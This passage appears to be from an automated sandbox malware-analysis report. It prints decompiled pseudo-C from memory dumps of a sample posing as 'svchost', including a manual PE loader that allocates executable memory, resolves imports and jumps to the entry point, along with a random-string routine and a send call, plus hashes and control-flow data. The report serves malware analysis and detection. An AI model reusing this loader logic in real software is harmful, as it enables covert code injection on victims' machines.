                                                                                                                                                                                                                                                                          • send.WS2_32(?,00000000,00000000,00000000), ref: 04001146
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: send
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2809346765-0
                                                                                                                                                                                                                                                                          • Opcode ID: b2e598ef71c8ac5d0c56a500729e24b321e62eb8f582e8b020920d41a4434bf5
                                                                                                                                                                                                                                                                          • Instruction ID: 7140d396e4fa338b1c45032ebff5f33e510887e1da457bfc48643044175dbf3e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2e598ef71c8ac5d0c56a500729e24b321e62eb8f582e8b020920d41a4434bf5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80012234A00348FBEF14CFA8D845BEE77B4AB44318F10C658E9656B2C0D7B6A651EB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 248 40013b0-40013c1 249 4001421-4001427 248->249 250 40013c3-40013c7 248->250 250->249 251 40013c9-40013d0 250->251 252 40013db-40013e1 251->252 253 4001411-400141a 252->253 254 40013e3-400140f QueryPerformanceCounter Sleep 252->254 253->249 255 40013d2-40013d8 254->255 255->252
                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040013B0(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                          				union _LARGE_INTEGER _v20;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					while(_v12 < _a8) {
                                                                                                                                                                                                                                                                          						QueryPerformanceCounter( &_v20);
                                                                                                                                                                                                                                                                          						Sleep(0); // executed
                                                                                                                                                                                                                                                                          						_t17 = _v20.LowPart % 0x3d + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz1234567890"; // 0x44434241
                                                                                                                                                                                                                                                                          						 *((char*)(_a4 + _v12)) =  *_t17;
                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					 *((char*)(_a4 + _a8)) = 0;
                                                                                                                                                                                                                                                                          					_v8 = 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                          0x040013b6
                                                                                                                                                                                                                                                                          0x040013c1
                                                                                                                                                                                                                                                                          0x040013c9
                                                                                                                                                                                                                                                                          0x040013db
                                                                                                                                                                                                                                                                          0x040013e7
                                                                                                                                                                                                                                                                          0x040013ef
                                                                                                                                                                                                                                                                          0x04001407
                                                                                                                                                                                                                                                                          0x0400140d
                                                                                                                                                                                                                                                                          0x040013d8
                                                                                                                                                                                                                                                                          0x040013d8
                                                                                                                                                                                                                                                                          0x04001417
                                                                                                                                                                                                                                                                          0x0400141a
                                                                                                                                                                                                                                                                          0x0400141a
                                                                                                                                                                                                                                                                          0x04001427

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                          • Opcode ID: a7db8480fdc823d777aef3822c45b88b551d9c425098c02d9d2f571069091408
                                                                                                                                                                                                                                                                          • Instruction ID: 9d74403c1c2c7bb1751bbbba9dc0b5917814bf527727232baae25755bbc2d242
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7db8480fdc823d777aef3822c45b88b551d9c425098c02d9d2f571069091408
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18011A30904208EBEB01CF98D494BEDBBB1FF44308F14C098E9496B381D379AA84CB81
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 256 4011cd-4011e4 257 401253-401255 256->257 258 4011e6-4011e9 256->258 259 4011ea-4011ef 258->259 260 4011f1-401204 LoadLibraryExA 259->260 261 40124a-40124f 259->261 260->257 262 401206-40120d 260->262 261->257 263 401212-401218 262->263 264 40120f 262->264 265 40121b-40121f 263->265 264->263 266 401221-401224 265->266 267 401226-40122b 265->267 266->259 268 401235 267->268 269 40122d-401233 267->269 270 40123a-401248 268->270 269->270 270->265
                                                                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                                                                          			E004011CD(intOrPtr _a4, intOrPtr _a8, signed int _a16) {
                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                          				signed int _t22;
                                                                                                                                                                                                                                                                          				intOrPtr _t23;
                                                                                                                                                                                                                                                                          				signed int _t26;
                                                                                                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                                                                                                          				intOrPtr* _t34;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				asm("pushad");
                                                                                                                                                                                                                                                                          				_t33 =  *((intOrPtr*)(_a4 +  *((intOrPtr*)(_a4 + 0x3c)) + 0x80));
                                                                                                                                                                                                                                                                          				if(_t33 != 0) {
                                                                                                                                                                                                                                                                          					_t34 = _t33 + _a4;
                                                                                                                                                                                                                                                                          					asm("cld");
                                                                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                                                                          						_t23 =  *((intOrPtr*)(_t34 + 0xc));
                                                                                                                                                                                                                                                                          						if(_t23 == 0) {
                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t22 = LoadLibraryExA(_t23 + _a4, 0, 0);
                                                                                                                                                                                                                                                                          						if(_t22 != 0) {
                                                                                                                                                                                                                                                                          							_v8 = _t22;
                                                                                                                                                                                                                                                                          							if( *_t34 == 0) {
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                          								asm("lodsd");
                                                                                                                                                                                                                                                                          								if(_t22 == 0) {
                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if((_t22 & 0x80000000) != 0) {
                                                                                                                                                                                                                                                                          									_t26 = _t22 & 0x0000ffff;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_t26 = _t22 + _a4 + 2;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t22 =  *((intOrPtr*)(_a8 + 0x29af9))(_v8, _t26);
                                                                                                                                                                                                                                                                          								asm("stosd");
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t34 = _t34 + 0x14;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t22 = 1;
                                                                                                                                                                                                                                                                          					_a16 = 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				L14:
                                                                                                                                                                                                                                                                          				asm("popad");
                                                                                                                                                                                                                                                                          				return _t22;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x004011d3
                                                                                                                                                                                                                                                                          0x004011e0
                                                                                                                                                                                                                                                                          0x004011e4
                                                                                                                                                                                                                                                                          0x004011e6
                                                                                                                                                                                                                                                                          0x004011e9
                                                                                                                                                                                                                                                                          0x004011ea
                                                                                                                                                                                                                                                                          0x004011ea
                                                                                                                                                                                                                                                                          0x004011ef
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004011fc
                                                                                                                                                                                                                                                                          0x00401204
                                                                                                                                                                                                                                                                          0x00401206
                                                                                                                                                                                                                                                                          0x0040120d
                                                                                                                                                                                                                                                                          0x0040120d
                                                                                                                                                                                                                                                                          0x0040121b
                                                                                                                                                                                                                                                                          0x0040121b
                                                                                                                                                                                                                                                                          0x0040121f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0040122b
                                                                                                                                                                                                                                                                          0x00401235
                                                                                                                                                                                                                                                                          0x0040122d
                                                                                                                                                                                                                                                                          0x00401230
                                                                                                                                                                                                                                                                          0x00401230
                                                                                                                                                                                                                                                                          0x00401241
                                                                                                                                                                                                                                                                          0x00401247
                                                                                                                                                                                                                                                                          0x00401247
                                                                                                                                                                                                                                                                          0x00401221
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401221
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401204
                                                                                                                                                                                                                                                                          0x0040124a
                                                                                                                                                                                                                                                                          0x0040124f
                                                                                                                                                                                                                                                                          0x0040124f
                                                                                                                                                                                                                                                                          0x00401253
                                                                                                                                                                                                                                                                          0x00401253
                                                                                                                                                                                                                                                                          0x00401255

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 004011FC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.558761324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1d8c67a6fd8a031ce9178923ff6fa604b01da3edc277bbd736844eb450087ab7
                                                                                                                                                                                                                                                                          • Instruction ID: 35013e2e2bdfb2c25cf3a4b33a37da36620c85c937569e224cb1d264aff8bf43
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d8c67a6fd8a031ce9178923ff6fa604b01da3edc277bbd736844eb450087ab7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5114872944205AFDF10CF44C8C0B9A37A4AF15354F2981B9EC19FB3A2D374EE148B99
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 272 401126-40114c VirtualAlloc 273 40116b-401185 272->273 274 40114e-401167 272->274 275 40118b-4011a6 273->275 274->273 278 401169 274->278 275->275 277 4011a8-4011c6 call 4011cd call 401258 call 4001780 275->277 280 4011c8-4011ca 277->280 278->280
                                                                                                                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                                                                                                                          			E00401126(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				asm("pushad");
                                                                                                                                                                                                                                                                          				_t55 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                          				_t27 = VirtualAlloc( *(_t55 + 0x34),  *(_t55 + 0x50), 0x3000, 0x40);
                                                                                                                                                                                                                                                                          				if(_t27 != 0) {
                                                                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                                                                          					_v8 = _t27;
                                                                                                                                                                                                                                                                          					asm("cld");
                                                                                                                                                                                                                                                                          					memcpy(_v8, _a4,  *(_t55 + 0x54));
                                                                                                                                                                                                                                                                          					_t57 = _t55;
                                                                                                                                                                                                                                                                          					_push(_t57);
                                                                                                                                                                                                                                                                          					_t58 = _t57 + 0xf8;
                                                                                                                                                                                                                                                                          					asm("pushad");
                                                                                                                                                                                                                                                                          					asm("cld");
                                                                                                                                                                                                                                                                          					memcpy(_v8 +  *((intOrPtr*)(_t57 + 0x104)), _a4 +  *((intOrPtr*)(_t57 + 0x10c)),  *(_t58 + 0x10));
                                                                                                                                                                                                                                                                          					asm("popad");
                                                                                                                                                                                                                                                                          					asm("loop 0xffffffe5");
                                                                                                                                                                                                                                                                          					_pop(_t61);
                                                                                                                                                                                                                                                                          					E004011CD(_v8, _a8); // executed
                                                                                                                                                                                                                                                                          					E00401258();
                                                                                                                                                                                                                                                                          					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x28)) + _v8))(_v8); // executed
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_t27 =  *((intOrPtr*)(_a8 + 0x29afd))(0,  *(_t55 + 0x50), 0x3000, 0x40);
                                                                                                                                                                                                                                                                          					if(_t27 != 0) {
                                                                                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				asm("popad");
                                                                                                                                                                                                                                                                          				return _t37;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x0040112c
                                                                                                                                                                                                                                                                          0x00401130
                                                                                                                                                                                                                                                                          0x00401144
                                                                                                                                                                                                                                                                          0x0040114c
                                                                                                                                                                                                                                                                          0x0040116b
                                                                                                                                                                                                                                                                          0x0040116b
                                                                                                                                                                                                                                                                          0x0040116e
                                                                                                                                                                                                                                                                          0x0040117b
                                                                                                                                                                                                                                                                          0x0040117d
                                                                                                                                                                                                                                                                          0x0040117e
                                                                                                                                                                                                                                                                          0x00401185
                                                                                                                                                                                                                                                                          0x00401197
                                                                                                                                                                                                                                                                          0x0040119f
                                                                                                                                                                                                                                                                          0x004011a0
                                                                                                                                                                                                                                                                          0x004011a2
                                                                                                                                                                                                                                                                          0x004011a6
                                                                                                                                                                                                                                                                          0x004011a8
                                                                                                                                                                                                                                                                          0x004011af
                                                                                                                                                                                                                                                                          0x004011b7
                                                                                                                                                                                                                                                                          0x004011c6
                                                                                                                                                                                                                                                                          0x0040114e
                                                                                                                                                                                                                                                                          0x00401163
                                                                                                                                                                                                                                                                          0x00401167
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401169
                                                                                                                                                                                                                                                                          0x00401167
                                                                                                                                                                                                                                                                          0x004011c8
                                                                                                                                                                                                                                                                          0x004011ca

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00401144
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.558761324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                          • Opcode ID: f46dcd975488781c9cddb351eca70577c1689cc1756a23961b888947e9d6707a
                                                                                                                                                                                                                                                                          • Instruction ID: 6f389262607e94f6ca6fd2432eff30f66c048e0178ed9f8f27be01fdfe11bbb9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f46dcd975488781c9cddb351eca70577c1689cc1756a23961b888947e9d6707a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02115E32600615ABCB21DF64CD81B8BB7F4AF09324F144469AA1ABB691D771FA00DB88
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 288 4016cd0-4016cf8 call 4007010 291 4016d14-4016d18 288->291 292 4016cfa-4016d0f call 4008b48 288->292 293 4016d34-4016d38 291->293 294 4016d1a-4016d2f call 4008b48 291->294 304 4016f5d-4016f60 292->304 297 4016d54-4016d58 293->297 298 4016d3a-4016d4f call 4008b48 293->298 294->304 302 4016d74-4016d78 297->302 303 4016d5a-4016d6f call 4008b48 297->303 298->304 307 4016d94-4016d98 302->307 308 4016d7a-4016d8f call 4008b48 302->308 303->304 309 4016db4-4016db8 307->309 310 4016d9a-4016daf call 4008b48 307->310 308->304 314 4016dd4-4016dd8 309->314 315 4016dba-4016dcf call 4008b48 309->315 310->304 319 4016df4-4016df8 314->319 320 4016dda-4016def call 4008b48 314->320 315->304 323 4016e14-4016e18 319->323 324 4016dfa-4016e0f call 4008b48 319->324 320->304 325 4016e34-4016e38 323->325 326 4016e1a-4016e2f call 4008b48 323->326 324->304 330 4016e54-4016e58 325->330 331 4016e3a-4016e4f call 4008b48 325->331 326->304 335 4016e74-4016e78 330->335 336 4016e5a-4016e6f call 4008b48 330->336 331->304 339 4016e94-4016e98 335->339 340 4016e7a-4016e8f call 4008b48 335->340 336->304 341 4016eb4-4016eb8 339->341 342 4016e9a-4016eaf call 4008b48 339->342 340->304 346 4016ed4-4016ed8 341->346 347 4016eba-4016ecf call 4008b48 341->347 342->304 351 4016ef1-4016ef5 346->351 352 4016eda-4016eef call 4008b48 346->352 347->304 355 4016ef7-4016f0c call 4008b48 351->355 356 4016f0e-4016f12 351->356 352->304 355->304 357 4016f14-4016f29 call 4008b48 356->357 358 4016f2b-4016f2f 356->358 357->304 362 4016f31-4016f46 call 4008b48 358->362 363 4016f48-4016f5a call 4008b48 358->363 362->304 363->304
                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04016CD0(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = _a8;
                                                                                                                                                                                                                                                                          				_v12 = _a12;
                                                                                                                                                                                                                                                                          				_t117 = _v12;
                                                                                                                                                                                                                                                                          				E04007010(__edi, _v8, 0, _v12);
                                                                                                                                                                                                                                                                          				if(_a4 != 1) {
                                                                                                                                                                                                                                                                          					if(_a4 != 0) {
                                                                                                                                                                                                                                                                          						if(_a4 != 2) {
                                                                                                                                                                                                                                                                          							if(_a4 != 3) {
                                                                                                                                                                                                                                                                          								if(_a4 != 4) {
                                                                                                                                                                                                                                                                          									if(_a4 != 5) {
                                                                                                                                                                                                                                                                          										if(_a4 != 6) {
                                                                                                                                                                                                                                                                          											if(_a4 != 7) {
                                                                                                                                                                                                                                                                          												if(_a4 != 8) {
                                                                                                                                                                                                                                                                          													if(_a4 != 0x10) {
                                                                                                                                                                                                                                                                          														if(_a4 != 9) {
                                                                                                                                                                                                                                                                          															if(_a4 != 0xa) {
                                                                                                                                                                                                                                                                          																if(_a4 != 0xb) {
                                                                                                                                                                                                                                                                          																	if(_a4 != 0xc) {
                                                                                                                                                                                                                                                                          																		if(_a4 != 0xd) {
                                                                                                                                                                                                                                                                          																			if(_a4 != 0xe) {
                                                                                                                                                                                                                                                                          																				if(_a4 != 0xf) {
                                                                                                                                                                                                                                                                          																					if(_a4 != 0x12) {
                                                                                                                                                                                                                                                                          																						if(_a4 != 0x11) {
                                                                                                                                                                                                                                                                          																							return E04008B48(_t117, _v8, _v12, 0x4273f8);
                                                                                                                                                                                                                                                                          																						}
                                                                                                                                                                                                                                                                          																						return E04008B48(_v8, _v8, _v12, 0x4273f0);
                                                                                                                                                                                                                                                                          																					}
                                                                                                                                                                                                                                                                          																					return E04008B48(_v12, _v8, _v12, 0x4273e8);
                                                                                                                                                                                                                                                                          																				}
                                                                                                                                                                                                                                                                          																				return E04008B48(_t117, _v8, _v12, 0x4273d8);
                                                                                                                                                                                                                                                                          																			}
                                                                                                                                                                                                                                                                          																			return E04008B48(_v8, _v8, _v12, 0x4273c8);
                                                                                                                                                                                                                                                                          																		}
                                                                                                                                                                                                                                                                          																		return E04008B48(_v12, _v8, _v12, 0x4273b4);
                                                                                                                                                                                                                                                                          																	}
                                                                                                                                                                                                                                                                          																	return E04008B48(_t117, _v8, _v12, 0x42739c);
                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                          																return E04008B48(_v8, _v8, _v12, 0x427384);
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															return E04008B48(_v12, _v8, _v12, 0x427374);
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          														return E04008B48(_t117, _v8, _v12, 0x42736c);
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													return E04008B48(_v8, _v8, _v12, 0x427360);
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												return E04008B48(_v12, _v8, _v12, 0x427358);
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											return E04008B48(_t117, _v8, _v12, 0x42734c);
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										return E04008B48(_v8, _v8, _v12, 0x427344);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									return E04008B48(_v12, _v8, _v12, 0x427338);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								return E04008B48(_t117, _v8, _v12, 0x427328);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							return E04008B48(_v8, _v8, _v12, 0x42731c);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						return E04008B48(_v12, _v8, _v12, 0x427310);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return E04008B48(_t117, _v8, _v12, 0x427300);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return E04008B48(_v8, _v8, _v12, 0x4272f4);
                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                          0x04016cd9
                                                                                                                                                                                                                                                                          0x04016cdf
                                                                                                                                                                                                                                                                          0x04016ce2
                                                                                                                                                                                                                                                                          0x04016cec
                                                                                                                                                                                                                                                                          0x04016cf8
                                                                                                                                                                                                                                                                          0x04016d18
                                                                                                                                                                                                                                                                          0x04016d38
                                                                                                                                                                                                                                                                          0x04016d58
                                                                                                                                                                                                                                                                          0x04016d78
                                                                                                                                                                                                                                                                          0x04016d98
                                                                                                                                                                                                                                                                          0x04016db8
                                                                                                                                                                                                                                                                          0x04016dd8
                                                                                                                                                                                                                                                                          0x04016df8
                                                                                                                                                                                                                                                                          0x04016e18
                                                                                                                                                                                                                                                                          0x04016e38
                                                                                                                                                                                                                                                                          0x04016e58
                                                                                                                                                                                                                                                                          0x04016e78
                                                                                                                                                                                                                                                                          0x04016e98
                                                                                                                                                                                                                                                                          0x04016eb8
                                                                                                                                                                                                                                                                          0x04016ed8
                                                                                                                                                                                                                                                                          0x04016ef5
                                                                                                                                                                                                                                                                          0x04016f12
                                                                                                                                                                                                                                                                          0x04016f2f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016f5a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016f43
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016f26
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016f09
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016eec
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016ecc
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016eac
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016e8c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016e6c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016e4c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016e2c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016e0c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016dec
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016dcc
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016dac
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016d8c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016d6c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016d4c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04016d2c
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _strcpy_s$_memset
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 987253425-0
                                                                                                                                                                                                                                                                          • Opcode ID: 44218adf272bf707b1ed20d16bc8d9ad3aaffc81e79ba637950d93952a6c6a75
                                                                                                                                                                                                                                                                          • Instruction ID: 6ffbbe254bd13291fa03b93f874eca1d4a54b98d90e1905f46e8f856855b0833
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44218adf272bf707b1ed20d16bc8d9ad3aaffc81e79ba637950d93952a6c6a75
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC7172B6E04208FBDF50DF94EC818DEB7B4AB4A609F20C459F90976290D135BA48EB56
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                                                          			E040137A0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				short _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                          				char _v30;
                                                                                                                                                                                                                                                                          				short _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                          				short _v44;
                                                                                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                                                                                          				signed int _v52;
                                                                                                                                                                                                                                                                          				signed int _v56;
                                                                                                                                                                                                                                                                          				signed int _v60;
